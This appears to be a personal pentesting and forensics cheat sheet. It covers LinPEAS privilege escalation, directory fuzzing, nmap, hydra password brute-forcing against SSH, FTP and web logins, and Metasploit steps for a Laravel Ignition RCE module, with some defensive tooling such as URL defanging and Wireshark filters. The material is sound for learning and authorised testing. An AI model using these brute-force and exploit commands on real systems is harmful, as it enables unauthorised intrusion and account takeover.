Privilege escalation
LinPEAS — Linux Privilege Escalation Awesome Script
github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
scp linpeas.sh ramen@$ip:/dev/shm
note:
→"SCP" stands for "Secure Copy Protocol." It is a command line tool in Linux and other Unix-based operating systems that allows users to securely transfer files between computers.
→"/dev/shm" is a directory on Linux and Unix-based systems that is used for shared memory. It is also worth noting that the content of /dev/shm is usually not persistent across reboots, and will be deleted upon reboot or unmount.
chmod 700 linpeas.sh
./linpeas.sh
Email Analysis
- emlAnalyzer

- email reputation check: https://emailrep.io/
INQUEST LABS (INDICATOR LOOKUP)
Like VirusTotal, InQuest provides a complete network forensics picture, from session details such as header information to file details such as the hash, size, type and even the raw file.

WEB
FFUF
ffuf is a command-line tool used for web application fuzzing and content discovery.
ffuf -u http://example.com/FUZZ -w wordlist.txt -e php -c 50 -fc 10
ffuf -u http://$ip/FUZZ -w wordlist.txt -e php -c 50 -fc 10
ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c 50 -fc 10
Here are some commonly used options in the ffuf command:
-w : Specifies the wordlist to use for fuzzing
-c : Specifies the number of concurrent connections to use (default is 40)
-r : Specifies the request file containing the request to be fuzzed
-e : Specifies the extensions to be used in the fuzzing process
-fc : Specifies the number of failed responses to be ignored before ffuf stops (default is 0)
-v : Enables verbose output, showing each request as it is sent
wfuzz
Bruteforce login:


gobuster
(fuzzing)
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x sh,cgi,php,txt,html,js,css,py
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
seclist directory: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
CyberChef
Defang URL: rendered harmlessly

Defang IP Address:

How to use cyberchef:
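Defanging, as CyberChef's "Defang URL" and "Defang IP Address" recipes do it, just rewrites the indicator so it cannot be clicked or auto-resolved. The following is an added Python example (not part of the original notes, not CyberChef's code) that implements the common hxxp / [.] convention for a single URL, a single IPv4 address, and free text such as an email body; the sample indicators are constructed.

```python
import re

# Constructed sample indicators for the demo (not taken from the notes above):
# a reserved documentation host name and an RFC 5737 documentation address.
SAMPLE_URL = "https://evil.example.com/download.php?f=a.exe"
SAMPLE_IP = "192.0.2.44"


def defang_ip(ip: str) -> str:
    """Bracket every dot so the address is neither clickable nor auto-linked."""
    return ip.replace(".", "[.]")


def defang_url(url: str) -> str:
    """Defang a URL in the hxxp / [.] convention:
    leading http -> hxxp (https -> hxxps), '://' -> '[://]', every '.' -> '[.]'."""
    out = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    out = out.replace("://", "[://]")
    return out.replace(".", "[.]")


def refang(indicator: str) -> str:
    """Reverse the defanging so the value can be fed to a lookup tool again."""
    out = indicator.replace("[.]", ".").replace("[://]", "://")
    return re.sub(r"^hxxp", "http", out, flags=re.IGNORECASE)


def defang_text(text: str) -> str:
    """Defang every http(s) URL and dotted-quad IPv4 address found in free text
    (an email body, a report) so it can be pasted into a ticket safely.
    URLs are handled first; their dots are then already bracketed, so an IP
    embedded in a URL is not defanged twice."""
    url_re = r"\bhttps?://\S+"
    ipv4_re = r"\b(?:\d{1,3}\.){3}\d{1,3}\b"
    text = re.sub(url_re, lambda m: defang_url(m.group(0)), text, flags=re.IGNORECASE)
    return re.sub(ipv4_re, lambda m: defang_ip(m.group(0)), text)


if __name__ == "__main__":
    print(defang_url(SAMPLE_URL))
    print(defang_ip(SAMPLE_IP))
    print(defang_text("Phish points to http://evil.example.com/x from 192.0.2.44"))
```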
enum4linux
Enum4linux is a tool for enumerating information from Windows and Samba systems.
command:
Attempt to get the user list (-U) and OS information (-o) from the target (192.168.1.200):
enum4linux -U -o 192.168.1.200
enum4linux -h
Options are (like “enum”):
-U | get userlist
-M | get machine list*
-S | get sharelist
-P | get password policy information
-G | get group and member list
-d | be detailed, applies to -U and -S
-u user | specify username to use (default “”)
-p pass | specify password to use (default “”)
nmap
Scan in verbose mode (-v), enable OS detection, version detection, script scanning, and traceroute (-A), with version detection (-sV) against the target IP (192.168.1.1):
nmap -v -A -sV 192.168.1.1
Save the output of Nmap: Syntax: nmap -oN </path/filename.txt> <target>
nmap -sS -p- -O --script vuln -T1 -v www.<website>
-v → verbosity
-sS → stealth scan
-p- → all ports
-O → os detection
-D → decoy
use the scripting engine → --script
use all the scripts in vuln → --script vuln
• Ping Scan: Allows scanning the live hosts in the network without going deeper and checking for ports, services, etc. Usage: nmap -sn 10.10.13.38
• Operating System Scan: Allows scanning of the type of OS running on a live host. Usage: nmap -O 10.10.13.38
• Detecting Services: Get a list of running services on a live host. Usage: nmap -sV 10.10.13.38
• TCP SYN Scan: Get the list of live hosts and associated ports on the hosts without completing the TCP three-way handshake, making the scan a little stealthier. Usage: nmap -sS 10.10.13.38
/usr/share/nmap/scripts → head script.db →
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } }
Entry { filename = "address-info.nse", categories = { "default", "safe", } }
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "afp-ls.nse", categories = { "discovery", "safe", } }
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "afp-showmount.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } }
Entry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } }
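When you pass a category name such as `--script vuln`, nmap selects every script whose script.db entry carries that category, so reading script.db tells you in advance what a category will actually run. The following added Python example (my own, not part of nmap or of the notes above) parses the Entry format shown above from a constructed excerpt and lists, per category, which scripts are also tagged "intrusive", the ones worth reviewing before running a whole category against a host you are responsible for.

```python
import re

# Constructed excerpt in the script.db format (a handful of entries, not the real file);
# on a live system read /usr/share/nmap/scripts/script.db instead.
SCRIPT_DB = '''
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } }
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } }
'''

# One Entry { filename = "...", categories = { "...", "...", } } record per match.
ENTRY_RE = re.compile(
    r'Entry\s*\{\s*filename\s*=\s*"([^"]+)"\s*,\s*categories\s*=\s*\{([^}]*)\}\s*\}'
)


def parse_script_db(text: str) -> dict:
    """Return {script filename: set of category names} for every Entry record."""
    scripts = {}
    for match in ENTRY_RE.finditer(text):
        categories = set(re.findall(r'"([^"]+)"', match.group(2)))
        scripts[match.group(1)] = categories
    return scripts


def scripts_in_category(db: dict, category: str) -> list:
    """The scripts '--script <category>' would select: every script tagged with it."""
    return sorted(name for name, cats in db.items() if category in cats)


def intrusive_scripts(db: dict, category: str) -> list:
    """Subset of a category that is also tagged 'intrusive' (may crash or alter the
    target), i.e. what to audit before running the category wholesale."""
    return sorted(
        name for name in scripts_in_category(db, category) if "intrusive" in db[name]
    )


if __name__ == "__main__":
    db = parse_script_db(SCRIPT_DB)
    for cat in ("safe", "vuln", "brute"):
        print(cat, scripts_in_category(db, cat), "intrusive:", intrusive_scripts(db, cat))
```

To run the real file through it, replace SCRIPT_DB with `open("/usr/share/nmap/scripts/script.db").read()`.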
hydra
hydra -l user -P passlist.txt ftp://<IP>
another way :
hydra -l molly -P /opt/rockyou.txt <IP> -t 4 ssh
brute force web login →
hydra -l molly -P /opt/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect"
hydra -l Reese -P /opt/rockyou.txt <IP> http-post-form "/login:username=Reese&password=^PASS^:Authentication failed"
refer: https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
find sha256 hash value
(checksum)
sha256sum <path to file>
shred
shred prevents the recovery of deleted files in Linux by overwriting the deleted file with random data.
shred [options] [filename]
shred -nuvf 10 [path]
-n Specifies the number of overwrites.
-u Overwrite and delete.
-s Amount of bytes to shred.
-v Show extended information.
-f Force shred command.
-z Hide shredding.
--version Display shred version information.
--help Display help.
site: https://phoenixnap.com/kb/shred-linux
tar
tar -xvzf
x — instructs tar to extract the files from the zipped file
v — means verbose, or to list out the files it’s extracting
z — instructs tar to decompress the files — without this, you’d have a folder full of compressed files
f — tells tar the filename you want it to work on
gunzip

multiple files:
Syntax:
gunzip [file1] [file2] [file3]...
For the many other gzip/gunzip flags, refer to: https://www.geeksforgeeks.org/gunzip-command-in-linux-with-examples/
redshift
an application that adjusts the computer display’s color temperature/reading mode/night light
redshift -O 4000K -r -P
redshift -p : detect current temperature
Metasploit
Type: msfconsole

# To search for a module, use the ‘search’ command:
msf6 > search laravel

#Load a module with the ‘use’ command
msf6 > use multi/php/ignition_laravel_debug_rce

#view the information about the module, including the module options, description, CVE details, etc
msf6 exploit(multi/php/ignition_laravel_debug_rce) > info
# View the available options to set
show options
# Set the target host and logging
set rhost <victim_ip>
set verbose true
# Set the payload listening address; this is the IP address of the host running Metasploit
set lhost LISTEN_IP(our_ip)
# show options again
show options
# Run or check the module
check
run
exploit

FORENSICS
binwalk (image forensics)
(1) Scan to identify code, files, and other information
$ binwalk <firmware-image>
(2) Extract files from firmware
$ binwalk -e <firmware-image>
Volatility
Volatility is an open-source memory forensics toolkit written in Python


volatility3.plugins package: https://volatility3.readthedocs.io/en/latest/volatility3.plugins.html
Detect It Easy (DIE)
(forensics) In Windows, right-click the sample and execute Detect It Easy (DIE). This tool provides information about the file, such as its architecture, significant headers, the packer used, and strings.
Github: https://github.com/horsicq/Detect-It-Easy
- Note: Strings are pieces of text inside a binary, often containing information such as IP addresses, URLs, or file names used by the malicious program.

CAPA
(forensics) CAPA detects capabilities in executable files, such as installing a service, opening network connections, modifying the registry, and so on.


Wireless
wireshark

To analyze a packet you can open the tool, drag and drop the file, or use the “File” menu.

- Use the “Statistics → Protocol Hierarchy” menu to view the overall usage of the ports and services.

We can see the TCP and UDP packets percentage below:

To view the list of IP conversations use the “Statistics → Conversations” section and navigate to the IPv4 section


which TCP port number has received more packets: go to TCP-3

3389 →RDP (Remote Desktop Protocol)
Filter the DNS packets:

We have the domain name and IP address:

Filter: “tcp”,”http”, “smtp”, “udp”, “dns”
ip.addr==<IP address>
tcp.dstport==80
Filter HTTP:


Resolve domain address: “view”


To

Save a filter and use whenever needed:

WINDOWS
crackmapexec
This package is a swiss army knife for pentesting Windows/Active Directory environments.
nmblookup
nmblookup is a command-line utility that allows you to query a Windows server for NetBIOS information, such as the list of shared resources. On a Linux system, you can use nmblookup to enumerate the shared resources on a Windows system.
MITMPROXY
mitmproxy2swagger
sudo mitmproxy2swagger -i flows -o spec.yml -p http://localhost:8888 -f flow
vim spec.yml
mitmproxy2swagger -i flows -o spec.yml -p http://localhost:8888 -f flow --examples